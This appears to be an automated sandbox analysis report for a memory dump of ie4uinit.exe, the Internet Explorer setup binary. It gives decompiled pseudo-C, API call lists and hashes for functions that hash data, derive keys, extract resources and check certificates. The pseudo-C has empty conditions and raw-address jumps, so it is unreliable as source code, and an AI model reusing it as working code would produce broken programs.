GetLastError.KERNEL32 ref: 00007FF7319CAE09

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: FileFind$CloseErrorLastwcscat_s$#149CreateFirstHandleNextwcscpy_s
String ID:
API String ID: 2239470773-0
Opcode ID: 113ee59415ec5d1752b21dd8af03456097b5f148b9c7ab2f31cca24d4a06286a
Instruction ID: c96a04d334cc4b2b8dd69c4730d42f428474fa168fffd82457f351857a98d92e
Opcode Fuzzy Hash: 113ee59415ec5d1752b21dd8af03456097b5f148b9c7ab2f31cca24d4a06286a
Instruction Fuzzy Hash: 0751B832E0C7C29AE760AB65E4403A9B3A0FB84768F904135DACD43A9CDFBCD545DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DEA9C Relevance: 16.6, APIs: 11, Instructions: 85
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00007FF77FF7319DEA9C(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __r9) {
				void* _t18;
				long _t19;
				long _t21;
				long _t23;
				long _t25;
				long _t27;
				long _t29;
				void* _t33;
				signed int _t35;
				void* _t36;
				long long _t58;
				void* _t69;
				long long _t75;
				void* _t78;
				void* _t79;
				void* _t82;

				_t58 = __rbx;
				 *((long long*)(_t78 + 0x10)) = __rbx;
				 *((long long*)(_t78 + 0x18)) = _t75;
				 *((long long*)(_t78 + 0x20)) = __rsi;
				_t79 = _t78 - 0x30;
				_t18 = r8b;
				 *((long long*)(__r9)) = __rbx;
				_t82 =  !=  ? 0x319edfb0 : 0x319edfc0;
				_t5 = _t58 + 0x10; // 0x10
				r9d = _t5;
				__imp__memcpy_s(_t69);
				r9d = 0;
				 *((long long*)(_t79 + 0x20)) = _t79 + 0x40;
				r8d = 0;
				__imp__CryptCreateHash();
				if (_t18 == 0) goto 0x319deb8c;
				_t10 = _t58 + 0x20; // 0x20
				r8d = _t10;
				r9d = 0;
				__imp__CryptHashData();
				if (_t18 == 0) goto 0x319deb48;
				r9d = 0x800000;
				 *((long long*)(_t79 + 0x20)) = __r9;
				__imp__CryptDeriveKey();
				if (_t18 != 0) goto 0x319deb7f;
				_t19 = GetLastError();
				_t20 =  ==  ? 1 : _t19;
				_t49 =  ==  ? 1 : _t19;
				if (( ==  ? 1 : _t19) > 0) goto 0x319deb6b;
				_t21 = GetLastError();
				_t22 =  ==  ? 1 : _t21;
				_t33 =  ==  ? 1 : _t21;
				goto 0x319deb7f;
				_t23 = GetLastError();
				_t24 =  ==  ? 1 : _t23;
				_t34 = ( ==  ? 1 : _t23) & 0x0000ffff;
				_t35 = ( ==  ? 1 : _t23) & 0x0000ffff | 0x80070000;
				__imp__CryptDestroyHash();
				goto 0x319debc3;
				_t25 = GetLastError();
				_t26 =  ==  ? 1 : _t25;
				_t53 =  ==  ? 1 : _t25;
				if (( ==  ? 1 : _t25) > 0) goto 0x319debaf;
				_t27 = GetLastError();
				_t28 =  ==  ? 1 : _t27;
				_t36 =  ==  ? 1 : _t27;
				goto 0x319debc3;
				_t29 = GetLastError();
				_t30 =  ==  ? 1 : _t29;
				_t37 = ( ==  ? 1 : _t29) & 0x0000ffff;
				_t38 = ( ==  ? 1 : _t29) & 0x0000ffff | 0x80070000;
				return ( ==  ? 1 : _t29) & 0x0000ffff | 0x80070000;
			}

0x7ff7319dea9c
0x7ff7319dea9c
0x7ff7319deaa1
0x7ff7319deaa6
0x7ff7319deaac
0x7ff7319deab0
0x7ff7319deab8
0x7ff7319deace
0x7ff7319dead9
0x7ff7319deadc
0x7ff7319deadf
0x7ff7319deaee
0x7ff7319deaf1
0x7ff7319deaf6
0x7ff7319deafe
0x7ff7319deb06
0x7ff7319deb11
0x7ff7319deb11
0x7ff7319deb15
0x7ff7319deb1b
0x7ff7319deb23
0x7ff7319deb2a
0x7ff7319deb39
0x7ff7319deb3e
0x7ff7319deb46
0x7ff7319deb48
0x7ff7319deb55
0x7ff7319deb58
0x7ff7319deb5a
0x7ff7319deb5c
0x7ff7319deb64
0x7ff7319deb67
0x7ff7319deb69
0x7ff7319deb6b
0x7ff7319deb73
0x7ff7319deb76
0x7ff7319deb79
0x7ff7319deb84
0x7ff7319deb8a
0x7ff7319deb8c
0x7ff7319deb99
0x7ff7319deb9c
0x7ff7319deb9e
0x7ff7319deba0
0x7ff7319deba8
0x7ff7319debab
0x7ff7319debad
0x7ff7319debaf
0x7ff7319debb7
0x7ff7319debba
0x7ff7319debbd
0x7ff7319debd9

APIs

memcpy_s.MSVCRT ref: 00007FF7319DEADF
CryptCreateHash.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEAFE
CryptHashData.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB1B
CryptDeriveKey.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB3E
GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB48
GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB5C
GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB6B
CryptDestroyHash.ADVAPI32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB84
GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEB8C
GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEBA0
GetLastError.KERNEL32(?,?,?,?,?,00007FF7319DE85D), ref: 00007FF7319DEBAF

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Crypt$Hash$CreateDataDeriveDestroymemcpy_s
String ID:
API String ID: 628050030-0
Opcode ID: 9021930f96504eeb5296fca52d21bf6ec67dc97231a112445ffaed2aa9fb0bbd
Instruction ID: 2470a9803a06ca45f4eeb1c9adfd7765461febffc9bf0c00b4dd4587e01e2871
Opcode Fuzzy Hash: 9021930f96504eeb5296fca52d21bf6ec67dc97231a112445ffaed2aa9fb0bbd
Instruction Fuzzy Hash: C031BC32F0CBC2D6F7506B66E844666A3A0FF84F98F844435D94E83658DFACE455A730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C9A98 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 163
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E00007FF77FF7319C9A98(signed int __ebx, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed long long* __r8, void* __r10) {
				void* __rdi;
				void* __rbp;
				void* _t43;
				void* _t58;
				signed long long _t91;
				unsigned long long _t92;
				unsigned long long _t98;
				void* _t119;
				long long _t127;
				void* _t129;
				void* _t132;
				signed long long _t133;
				long _t147;
				long _t149;
				signed long long* _t151;
				void* _t153;
				unsigned long long* _t154;

				_t117 = __rdx;
				 *((long long*)(_t132 + 8)) = __rbx;
				 *((long long*)(_t132 + 0x20)) = __rsi;
				_t3 = _t132 - 0x160; // -44
				_t130 = _t3;
				_t133 = _t132 - 0x260;
				_t91 =  *0x319f4658; // 0x8be7dd1f02a
				_t92 = _t91 ^ _t133;
				 *(_t3 + 0x150) = _t92;
				 *__r8 =  *__r8 & 0x00000000;
				_t154 = __r8;
				GetProcessHeap();
				_t5 = _t117 + 0x70; // 0x78
				r8d = _t5;
				HeapAlloc(_t153, _t149, _t147);
				_t98 = _t92;
				if (_t92 != 0) goto 0x319c9b1c;
				r9d = 0x8007000e;
				E00007FF77FF7319C7CCC();
				goto 0x319c9cbb;
				asm("xorps xmm0, xmm0");
				asm("movdqu [esp+0x30], xmm0");
				if ((__ebx & 0x00000003) != 0) goto 0x319c9ce8;
				r12d = 0x104;
				E00007FF77FF7319C1310(_t98, _t133 + 0x40, __rdx, __rcx, __r10);
				E00007FF77FF7319C31CC(_t98, _t133 + 0x40, __rdx, L"_p0");
				r8d = 1;
				_t12 = _t133 + 0x30; // 0x134
				r8d =  >  ? 0x7000e : r8d;
				_t43 = E00007FF77FF7319C955C(_t98, _t12, _t98 >> 2, _t98 >> 2 >> 0x1f, _t3, _t119, _t129);
				if (_t43 >= 0) goto 0x319c9baa;
				r9d = _t43;
				E00007FF77FF7319C7CCC();
				goto 0x319c9bea;
				E00007FF77FF7319C31CC(_t98, _t133 + 0x40, _t147, "h");
				r8d = 1;
				_t17 = _t133 + 0x38; // 0x13c
				r8d =  !=  ? __esi : r8d;
				if (E00007FF77FF7319C955C(_t98, _t17, _t98 >> 2, _t98 >> 2 >> 0x1f, _t3) >= 0) goto 0x319c9be8;
				goto 0x319c9b92;
				if (0 >= 0) goto 0x319c9c15;
				r9d = 0;
				E00007FF77FF7319C7CCC();
				_t151 =  *(_t133 + 0x38);
				_t127 =  *((intOrPtr*)(_t133 + 0x30));
				goto 0x319c9c7e;
				 *_t98 = 1;
				 *((long long*)(_t98 + 8)) =  *_t151;
				 *_t151 =  *_t151 & 0x00000000;
				r14d = 0;
				 *((long long*)(_t98 + 0x10)) =  *((intOrPtr*)(_t133 + 0x30));
				_t25 = _t127 + 0x58; // 0x58
				r12d = _t25;
				r8d = r12d;
				 *((long long*)(_t98 + 0x18)) =  *(_t133 + 0x38);
				 *((long long*)(_t133 + 0x30)) = _t127;
				 *(_t133 + 0x38) = _t151;
				memset(??, ??, ??);
				 *((intOrPtr*)(_t98 + 0x20)) = r12w;
				 *((intOrPtr*)(_t98 + 0x24)) = 1;
				_t33 = _t127 + 0x50; // 0x50
				r8d = _t33;
				memset(??, ??, ??);
				 *_t154 = _t98;
				if (_t151 == 0) goto 0x319c9c90;
				if (CloseHandle(??) == 0) goto 0x319c9cee;
				if (_t127 == 0) goto 0x319c9ca2;
				if (CloseHandle(??) == 0) goto 0x319c9d00;
				if (_t98 == 0) goto 0x319c9cbb;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				return E00007FF77FF7319E38D0(0, _t58,  *(_t130 + 0x150) ^ _t133);
			}

0x7ff7319c9a98
0x7ff7319c9a98
0x7ff7319c9a9d
0x7ff7319c9aaa
0x7ff7319c9aaa
0x7ff7319c9ab2
0x7ff7319c9ab9
0x7ff7319c9ac0
0x7ff7319c9ac3
0x7ff7319c9aca
0x7ff7319c9ace
0x7ff7319c9ad7
0x7ff7319c9ae5
0x7ff7319c9ae5
0x7ff7319c9ae9
0x7ff7319c9aef
0x7ff7319c9af5
0x7ff7319c9b0f
0x7ff7319c9b12
0x7ff7319c9b17
0x7ff7319c9b1c
0x7ff7319c9b1f
0x7ff7319c9b28
0x7ff7319c9b2e
0x7ff7319c9b46
0x7ff7319c9b5a
0x7ff7319c9b67
0x7ff7319c9b77
0x7ff7319c9b7e
0x7ff7319c9b82
0x7ff7319c9b8b
0x7ff7319c9ba0
0x7ff7319c9ba3
0x7ff7319c9ba8
0x7ff7319c9bb9
0x7ff7319c9bbe
0x7ff7319c9bcb
0x7ff7319c9bd2
0x7ff7319c9bdf
0x7ff7319c9be6
0x7ff7319c9bec
0x7ff7319c9bfc
0x7ff7319c9c04
0x7ff7319c9c09
0x7ff7319c9c0e
0x7ff7319c9c13
0x7ff7319c9c15
0x7ff7319c9c24
0x7ff7319c9c2a
0x7ff7319c9c2e
0x7ff7319c9c36
0x7ff7319c9c3a
0x7ff7319c9c3a
0x7ff7319c9c43
0x7ff7319c9c46
0x7ff7319c9c4a
0x7ff7319c9c4f
0x7ff7319c9c54
0x7ff7319c9c59
0x7ff7319c9c64
0x7ff7319c9c6b
0x7ff7319c9c6b
0x7ff7319c9c6f
0x7ff7319c9c7b
0x7ff7319c9c81
0x7ff7319c9c8e
0x7ff7319c9c93
0x7ff7319c9ca0
0x7ff7319c9ca5
0x7ff7319c9ca7
0x7ff7319c9cb5
0x7ff7319c9ce7

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7319C9AD7
HeapAlloc.KERNEL32 ref: 00007FF7319C9AE9
CloseHandle.KERNEL32 ref: 00007FF7319C9C86
CloseHandle.KERNEL32 ref: 00007FF7319C9C98
GetProcessHeap.KERNEL32 ref: 00007FF7319C9CA7
HeapFree.KERNEL32 ref: 00007FF7319C9CB5

Strings

wil, xrefs: 00007FF7319C9AFE, 00007FF7319C9B99, 00007FF7319C9BF5
_p0, xrefs: 00007FF7319C9B4B

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$CloseHandleProcess$AllocFree
String ID: _p0$wil
API String ID: 826427307-1814513734
Opcode ID: 41d6ffa8385c61e86ba7f5e3266a8a2509f3cd1dee9d41ce3d8820455ddc22be
Instruction ID: 1ada07b0a84c7193d5cd201bc5b48b305ad02c91271efc72db69d0843d13c169
Opcode Fuzzy Hash: 41d6ffa8385c61e86ba7f5e3266a8a2509f3cd1dee9d41ce3d8820455ddc22be
Instruction Fuzzy Hash: F0617632F18AC2A2E710EF21D8406A9A3A4FB84B88F958031DE8D47B5DDF7DD545DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C33A8 Relevance: 15.1, APIs: 10, Instructions: 104fileCOMMON

Download Yara Rule

APIs

#654.IERTUTIL ref: 00007FF7319C33FF
FindResourceW.KERNEL32 ref: 00007FF7319C340F
LoadResource.KERNEL32 ref: 00007FF7319C3426
LockResource.KERNEL32 ref: 00007FF7319C3438

Part of subcall function 00007FF7319C6B2C: #650.IERTUTIL ref: 00007FF7319C6B4F

Part of subcall function 00007FF7319C67D8: #650.IERTUTIL ref: 00007FF7319C681F

wcsrchr.MSVCRT ref: 00007FF7319C34C1
SHCreateDirectory.SHELL32 ref: 00007FF7319C34DA
CreateFileW.KERNEL32 ref: 00007FF7319C3509
SizeofResource.KERNEL32 ref: 00007FF7319C351D
WriteFile.KERNEL32 ref: 00007FF7319C353B
CloseHandle.KERNEL32 ref: 00007FF7319C3544

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Resource$#650CreateFile$#654CloseDirectoryFindHandleLoadLockSizeofWritewcsrchr
String ID:
API String ID: 3992202063-0
Opcode ID: 428148b18bb479405bdf88b632c14fddec18c450d94b75b39078339c1fde7bf5
Instruction ID: 63cafe3cea3ad96cc29183e9289c6bfb9bdf8199e6fa09a7e5434a31903bac0c
Opcode Fuzzy Hash: 428148b18bb479405bdf88b632c14fddec18c450d94b75b39078339c1fde7bf5
Instruction Fuzzy Hash: 8D41B376A1C7C2A2EB10EF11E444269B3A0FB88B98F808135DE8D17758DFBDE505CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D7AC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32 ref: 00007FF7319D7B2F
CertFindCertificateInStore.CRYPT32 ref: 00007FF7319D7B5C
GetLastError.KERNEL32 ref: 00007FF7319D7BC6

Part of subcall function 00007FF7319D780C: CertGetIntendedKeyUsage.CRYPT32 ref: 00007FF7319D7842
Part of subcall function 00007FF7319D780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF7319D7871
Part of subcall function 00007FF7319D780C: CertGetEnhancedKeyUsage.CRYPT32 ref: 00007FF7319D7899
Part of subcall function 00007FF7319D780C: StrCmpNA.SHLWAPI ref: 00007FF7319D78D1
Part of subcall function 00007FF7319D780C: StrCmpNW.SHLWAPI(?,?,00000000,00000000,?,00007FF7319D7A0D), ref: 00007FF7319D793D

Part of subcall function 00007FF7319D7C38: memset.MSVCRT ref: 00007FF7319D7C73
Part of subcall function 00007FF7319D7C38: CertGetCertificateChain.CRYPT32 ref: 00007FF7319D7CAA
Part of subcall function 00007FF7319D7C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF7319D7D0B
Part of subcall function 00007FF7319D7C38: CertVerifyCertificateChainPolicy.CRYPT32 ref: 00007FF7319D7D38
Part of subcall function 00007FF7319D7C38: CertFreeCertificateChain.CRYPT32 ref: 00007FF7319D7D8C

CryptImportPublicKeyInfo.CRYPT32 ref: 00007FF7319D7BAF
GetLastError.KERNEL32 ref: 00007FF7319D7BE8
CertFreeCertificateContext.CRYPT32 ref: 00007FF7319D7C04
CertCloseStore.CRYPT32 ref: 00007FF7319D7C14

Strings

Trust, xrefs: 00007FF7319D7B13

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Cert$Certificate$Chain$StoreUsage$EnhancedErrorFreeLastPolicyVerify$CloseContextCryptFindImportInfoIntendedOpenPublicmemset
String ID: Trust
API String ID: 1059425161-3418866602
Opcode ID: d2ee9b44ad53f75079dd3a31972df50917533427fd6d1c161ed58a75a08a27d8
Instruction ID: 367c4f9f79c1655b2249125edd4607f1784ef2ae444e24e90d3ea645ac9669d2
Opcode Fuzzy Hash: d2ee9b44ad53f75079dd3a31972df50917533427fd6d1c161ed58a75a08a27d8
Instruction Fuzzy Hash: 87418232F08B82A6EB14AF66D948769A3A0FF44B98F808135DE4C47758EF7DE4519720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C481C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E00007FF77FF7319C481C(void* __eax, void* __ecx, long long __rdi) {
				void* _t50;
				signed long long _t53;
				void* _t55;
				WCHAR* _t71;
				void* _t72;
				void* _t74;
				signed long long _t75;
				char* _t82;
				void* _t83;
				void* _t84;
				void* _t85;

				 *((long long*)(_t74 + 0x10)) = __rdi;
				_t2 = _t74 - 0x570; // -1406
				_t72 = _t2;
				_t75 = _t74 - 0x670;
				_t53 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t72 + 0x560) = _t53 ^ _t75;
				r8d = __ecx;
				_t4 = _t72 + 0x350; // -558
				_t68 = _t4;
				r9d = 0;
				__imp__SHGetSpecialFolderPathW();
				if (__eax == 0) goto 0x319c4948;
				_t82 = L"Internet Explorer";
				_t5 = _t72 + 0x350; // -558
				_t6 = _t72 + 0x140; // -1086
				E00007FF77FF7319C90F4(_t50, _t6, _t4, _t5, _t82, _t85);
				r9d = 0;
				_t7 = _t72 + 0x140; // -1086
				r8d = 0;
				_t8 = _t82 + 2; // 0x2
				E00007FF77FF7319C4244(_t8, _t55, _t7, _t4, _t85);
				GetModuleHandleW(_t71);
				r9d = 0x104;
				LoadStringW(??, ??, ??, ??);
				__imp__PathRemoveExtensionW();
				_t11 = _t75 + 0x30; // 0x22
				_t83 = _t11;
				_t12 = _t72 + 0x350; // -558
				_t13 = _t72 + 0x140; // -1086
				E00007FF77FF7319C90F4(_t50, _t13, _t4, _t12, _t83, _t85);
				r9d = 0;
				_t14 = _t72 + 0x140; // -1086
				r8d = 0;
				_t15 = _t83 + 2; // 0x2
				E00007FF77FF7319C4244(_t15, _t55, _t14, _t4, _t85);
				GetModuleHandleW(??);
				r9d = 0x104;
				LoadStringW(??, ??, ??, ??);
				__imp__PathRemoveExtensionW();
				_t18 = _t75 + 0x30; // 0x22
				_t84 = _t18;
				_t19 = _t72 + 0x350; // -558
				_t20 = _t72 + 0x140; // -1086
				E00007FF77FF7319C90F4(_t50, _t20, _t68, _t19, _t84, _t85);
				r9d = 0;
				_t21 = _t72 + 0x140; // -1086
				r8d = 0;
				_t22 = _t84 + 2; // 0x2
				return E00007FF77FF7319E38D0(E00007FF77FF7319C4244(_t22, _t55, _t21, _t68, _t85), 0,  *(_t72 + 0x560) ^ _t75);
			}

0x7ff7319c481c
0x7ff7319c4822
0x7ff7319c4822
0x7ff7319c482a
0x7ff7319c4831
0x7ff7319c483b
0x7ff7319c4842
0x7ff7319c4845
0x7ff7319c4845
0x7ff7319c484e
0x7ff7319c4851
0x7ff7319c4859
0x7ff7319c4864
0x7ff7319c486d
0x7ff7319c4874
0x7ff7319c487b
0x7ff7319c4880
0x7ff7319c4883
0x7ff7319c488a
0x7ff7319c488d
0x7ff7319c4891
0x7ff7319c4898
0x7ff7319c489e
0x7ff7319c48ae
0x7ff7319c48b9
0x7ff7319c48bf
0x7ff7319c48bf
0x7ff7319c48c6
0x7ff7319c48cd
0x7ff7319c48d4
0x7ff7319c48d9
0x7ff7319c48dc
0x7ff7319c48e3
0x7ff7319c48e6
0x7ff7319c48ea
0x7ff7319c48f1
0x7ff7319c48f7
0x7ff7319c4907
0x7ff7319c4912
0x7ff7319c4918
0x7ff7319c4918
0x7ff7319c491f
0x7ff7319c4926
0x7ff7319c492d
0x7ff7319c4932
0x7ff7319c4935
0x7ff7319c493c
0x7ff7319c493f
0x7ff7319c4967

APIs

SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C4851

Part of subcall function 00007FF7319C90F4: LocalFree.KERNEL32 ref: 00007FF7319C9312

Part of subcall function 00007FF7319C4244: SHCreateDirectory.SHELL32 ref: 00007FF7319C4301
Part of subcall function 00007FF7319C4244: PathFileExistsW.SHLWAPI ref: 00007FF7319C4356

GetModuleHandleW.KERNEL32 ref: 00007FF7319C4898
LoadStringW.USER32 ref: 00007FF7319C48AE
PathRemoveExtensionW.SHLWAPI ref: 00007FF7319C48B9
GetModuleHandleW.KERNEL32 ref: 00007FF7319C48F1
LoadStringW.USER32 ref: 00007FF7319C4907
PathRemoveExtensionW.SHLWAPI ref: 00007FF7319C4912

Part of subcall function 00007FF7319C90F4: LocalAlloc.KERNEL32 ref: 00007FF7319C91BE

Strings

Internet Explorer, xrefs: 00007FF7319C4864

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Path$ExtensionHandleLoadLocalModuleRemoveString$AllocCreateDirectoryExistsFileFolderFreeSpecial
String ID: Internet Explorer
API String ID: 715972500-1412615936
Opcode ID: 1b0beab515720545fd0eb81da0df046551aa5ce0d68455647aaa891b8692ddaa
Instruction ID: 4bca4c94068e0a10bd46a642d30526587932a363f1436f60336e828abd11f32e
Opcode Fuzzy Hash: 1b0beab515720545fd0eb81da0df046551aa5ce0d68455647aaa891b8692ddaa
Instruction Fuzzy Hash: E7313E72F189C2A6E760EF20E815BEA6361FF8474CF805032DA4E5795CDE78D609CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DED98 Relevance: 13.6, APIs: 9, Instructions: 145
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FF77FF7319DED98(signed int __edx, void* __edi, long long __rbx, void* __rcx, long long __r8, void* __r11) {
				void* __rdi;
				void* __rsi;
				signed char _t38;
				long _t44;
				long _t47;
				void* _t58;
				signed int _t60;
				char* _t85;
				long long _t86;
				char* _t89;
				void* _t109;
				char* _t110;
				void* _t112;
				char* _t113;
				long long _t115;
				void* _t116;
				char* _t118;
				void* _t119;
				void* _t131;
				void* _t132;
				struct _CRITICAL_SECTION* _t137;
				struct _CRITICAL_SECTION* _t139;

				_t131 = __r11;
				_t70 = __edi;
				_t85 = _t118;
				 *((long long*)(_t85 + 8)) = __rbx;
				 *((long long*)(_t85 + 0x10)) = _t115;
				 *((intOrPtr*)(_t85 + 0x20)) = r9d;
				 *((long long*)(_t85 + 0x18)) = __r8;
				_t119 = _t118 - 0x40;
				_t116 = __rcx;
				r14b = __edx;
				E00007FF77FF7319C1670();
				_t113 = _t85;
				E00007FF77FF7319C1670();
				_t110 = _t85;
				if (_t113 == 0) goto 0x319def71;
				if (_t85 == 0) goto 0x319def71;
				_t89 = _t85;
				r13d = __edi;
				if (r14b == 0) goto 0x319dee39;
				 *_t89 = 1;
				r9d =  *((intOrPtr*)(__rcx + 0x70));
				__imp__memcpy_s(_t112);
				r9d =  *((intOrPtr*)(__rcx + 0x48));
				__imp__memcpy_s();
				r12d =  *((intOrPtr*)(__rcx + 0x48));
				_t92 = _t85 + _t89 + 1 + _t85;
				__imp__CryptGenRandom();
				if ( *((intOrPtr*)(__rcx + 0x70)) == 0) goto 0x319def30;
				r9d = 0x10;
				__imp__memcpy_s();
				_t13 = _t92 + 0x10; // 0x10
				_t86 = _t13;
				 *((long long*)(_t119 + 0x38)) = _t86;
				_t15 = _t86 + 0x20; // 0x20
				_t135 = _t15;
				EnterCriticalSection(_t139);
				r9d =  *((intOrPtr*)(_t119 + 0x88));
				_t17 = _t119 + 0x30; // -101
				_t87 = _t17;
				 *((long long*)(_t119 + 0x28)) = _t17;
				 *((long long*)(_t119 + 0x20)) = _t15;
				if (E00007FF77FF7319DF108(0x10, _t17, _t85 + _t89 + 1 + _t85, __rcx, _t113, __rcx,  *((intOrPtr*)(_t119 + 0x80))) < 0) goto 0x319deee3;
				r8d =  *((intOrPtr*)(_t119 + 0x30));
				if (r12d - r13d + r8d !=  *((intOrPtr*)(_t119 + 0xa0))) goto 0x319deede;
				_t38 = E00007FF77FF7319DEFAC(r12d - r13d + r8d, _t85 + _t89 + 1 + _t85, _t116, _t15, _t113, _t116,  *((intOrPtr*)(_t119 + 0x38)));
				goto 0x319deee3;
				LeaveCriticalSection(_t137);
				if (0x80004005 < 0) goto 0x319def67;
				_t25 = _t119 + 0x30; // -101
				r14b =  ~r14b;
				asm("sbb al, al");
				 *((char*)( *((intOrPtr*)(_t119 + 0x90)))) = (_t38 & 0x000000f6) + 0x70;
				 *((intOrPtr*)(_t119 + 0x30)) =  *((intOrPtr*)(_t119 + 0x98)) - 1;
				E00007FF77FF7319DEC74( *((intOrPtr*)(_t119 + 0xa0)), _t70, _t85 + _t89 + 1 + _t85, _t110, _t135, _t110, _t113, _t116,  *((intOrPtr*)(_t119 + 0x90)) + 1, _t25, _t131, _t132, _t109);
				goto 0x319def67;
				_t44 = GetLastError();
